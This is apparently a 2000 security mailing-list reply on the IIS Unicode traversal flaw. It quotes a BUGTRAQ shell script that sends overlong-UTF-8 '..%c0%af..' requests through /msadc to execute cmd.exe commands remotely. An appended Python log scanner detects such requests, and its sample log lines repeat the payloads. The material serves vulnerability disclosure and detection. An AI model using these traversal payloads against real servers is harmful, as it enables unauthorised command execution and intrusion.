Subject: Re: Summary of IIS 4.0/5.0 Unicode thread (end of thread?)
From: syzop (syzDDS.NL)
Date: Fri Oct 27 2000 - 07:05:02 CDT


Ryan Yagatich wrote:

-- snip --

> Protection:
> There are multiple ways of getting around this. First of all, your webroot
> is the key. (So far) it has been shown that this code will only execute if
> the /winnt directory is located in the same as the webroot directory... Even
> though I haven't seen any tests for it, I'm sure you can substitute the
> unicode values for those smaller characters in it too. So by setting up
> different partitions during setup (or however you wish it to be) say c:
> contains the winntdir, and drive d: contains the webroot.

It IS possible in many cases, see the bugtraq posting '[BUGTRAQ] %c1%1c
NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!'
by Marco <m.v.berkumobit.nl>:
== snap ==
Remember the msadc RDS "feature" ?

Ok, so why not use /msadc ? It's a directory placed on the system drive
and usually accessible through normal HTTP requests.
Knowing this you would know that putting the website on a different
drive than your system drive would not make a difference at all ;)
You can put it on Q:\> if you like, you're still possibly
vulnerable.
Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
# the URL was wrapped by the mailer; the continuation backslash keeps it on one logical line
lynx -dump \
  http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7
--------------
./blaat.sh www.yourownmachine.com dir c:\\   <- you need the double
backslash to escape it.

And voila, a dir listing.

== snap ==

Cya

    Syz.
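The thread's point for defenders is that the overlong UTF-8 forms (%c0%af decoding to '/', %c1%1c to '\') let a request climb out of the webroot, and that a virtual directory such as /msadc on the system drive makes the "webroot on another drive" mitigation moot. Below is an added log-scanning example, not code from the thread or from any product: it emulates the lenient two-byte decoding on the URI field of constructed W3C-style IIS log lines and flags requests that escape the webroot. The log format, the client addresses, and the assumption that the decoder masks the second byte with 0x3F (which is what makes %c1%1c come out as '\') are mine.

```python
from urllib.parse import unquote_to_bytes

def lenient_decode(raw: bytes) -> tuple[str, bool]:
    """Emulate the faulty decoder: a 0xC0/0xC1 lead byte plus any following byte
    becomes ((lead & 0x1F) << 6) | (next & 0x3F), always < 0x80, i.e. an overlong
    ASCII char. Masking the second byte is an assumption matching %c1%1c -> '\\'.
    Returns (decoded_text, saw_overlong_sequence)."""
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong, i = True, i + 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), overlong

def escapes_webroot(path: str) -> bool:
    """True if '..' segments (with '/' or '\\' separators) climb above the root."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def scan_log(lines):
    """Parse constructed lines 'date time client method uri query status' and
    return one finding per request whose decoded URI escapes the webroot."""
    findings = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 6:
            continue  # W3C directive line or truncated record
        client, uri = parts[2], parts[4]
        decoded, overlong = lenient_decode(unquote_to_bytes(uri))
        if escapes_webroot(decoded):
            findings.append({"client": client, "uri": uri,
                             "decoded": decoded, "overlong_utf8": overlong})
    return findings

SAMPLE_LOG = [  # constructed log lines, not real traffic
    "2000-10-27 07:05:02 10.0.0.5 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200",
    "2000-10-27 07:05:09 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200",
    "2000-10-27 07:05:15 10.0.0.7 GET /images/../index.html - 200",
    "2000-10-27 07:05:20 10.0.0.7 GET /index.html - 200",
]
```

Because the check runs on the decoded path rather than on literal "%c0%af" strings, it also catches the plain "../" variant and other lead-byte/second-byte pairs that the same decoder would collapse to a separator.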